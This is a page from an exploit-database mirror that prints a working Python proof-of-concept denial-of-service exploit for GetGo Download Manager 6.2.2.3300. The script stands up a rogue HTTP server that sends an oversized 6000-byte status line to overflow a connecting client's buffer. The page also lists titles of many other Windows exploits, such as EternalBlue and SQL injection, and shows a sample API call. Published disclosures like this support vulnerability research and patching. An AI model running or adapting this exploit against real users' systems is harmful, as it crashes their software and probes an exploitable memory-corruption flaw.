Menu

Search for hundreds of thousands of exploits

"GetGo Download Manager 6.2.2.3300 - Denial of Service"

Author

"Malav Vyas"

Platform

windows_x86-64

Release date

2019-08-16

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
# Date: 2019-08-15
# Author - Malav Vyas
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
# Vendor Home Page: www.getgosoft.com
# Software Link: http://www.getgosoft.com/getgodm/
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
# Attack Type : Remote
# Impact : DoS
# Co-author - Velayuthm Selvaraj

# 1. Description
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and 
# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response.

# 2. Proof of Concept

import socket
from time import sleep
host = "192.168.0.112"
port = 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
sock.listen(1)
print "\n[+] Listening on %d ..." % port

cl, addr = sock.accept()
print "[+] Connected to %s" % addr[0]
evilbuffer = "A" * 6000
    
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"

sleep(30)
cl.close()
sock.close()
Release Date Title Type Platform Author
2019-08-16 "GetGo Download Manager 6.2.2.3300 - Denial of Service" dos windows_x86-64 "Malav Vyas"
2019-01-28 "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)" remote windows_x86-64 "Matteo Malvica"
2019-01-02 "NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2019-01-02 "NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2019-01-02 "EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)" dos windows_x86-64 Achilles
2018-11-16 "Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-16 "Mumsoft Easy Software 2.0 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-15 "Notepad3 1.0.2.350 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-14 "AMPPS 2.7 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-12 "Mongoose Web Server 6.9 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-12 "CuteFTP 9.3.0.3 - Denial of Service (PoC)" dos windows_x86-64 "Ismael Nava"
2018-11-06 "eToolz 3.4.8.0 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-06 "Blue Server 1.1 - Denial of Service (PoC)" dos windows_x86-64 "Ihsan Sencan"
2018-11-05 "Softros LAN Messenger 9.2 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-09-27 "Rausoft ID.prove 2.95 - 'Username' SQL injection" webapps windows_x86-64 "Ilya Timchenko"
2018-08-30 "Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting" webapps windows_x86-64 "Emre ÖVÜNÇ"
2018-08-30 "Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal" webapps windows_x86-64 "Emre ÖVÜNÇ"
2018-08-26 "ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting" webapps windows_x86-64 "Ismail Tasdelen"
2018-08-14 "Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)" remote windows_x86-64 "Raymond Wellnitz"
2018-05-28 "CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)" remote windows_x86-64 "Juan Prescotto"
2017-07-24 "Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)" remote windows_x86-64 redr2e
2017-05-17 "Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)" remote windows_x86-64 sleepya
2017-05-10 "Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)" remote windows_x86-64 "Juan Sacco"
2016-06-22 "PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit)" remote windows_x86-64 quanyechavshuo
2014-08-14 "Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit)" remote windows_x86-64 Metasploit
2018-10-29 "School Equipment Monitoring System 1.0 - 'login' SQL Injection" local windows_x86-64 "Ihsan Sencan"
2018-09-28 "PCProtect 4.8.35 - Privilege Escalation" local windows_x86-64 "Hashim Jawad"
2018-09-13 "InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)" local windows_x86-64 "Luis Martínez"
2018-09-11 "InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)" local windows_x86-64 "Luis Martínez"
2018-08-14 "Wansview 1.0.2 - Denial of Service (PoC)" local windows_x86-64 "Gionathan Reale"
Release Date Title Type Platform Author
2019-08-16 "GetGo Download Manager 6.2.2.3300 - Denial of Service" dos windows_x86-64 "Malav Vyas"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47282/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47282/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47282/41649/getgo-download-manager-6223300-denial-of-service/download/", "exploit_id": "47282", "exploit_description": "\"GetGo Download Manager 6.2.2.3300 - Denial of Service\"", "exploit_date": "2019-08-16", "exploit_author": "\"Malav Vyas\"", "exploit_type": "dos", "exploit_platform": "windows_x86-64", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse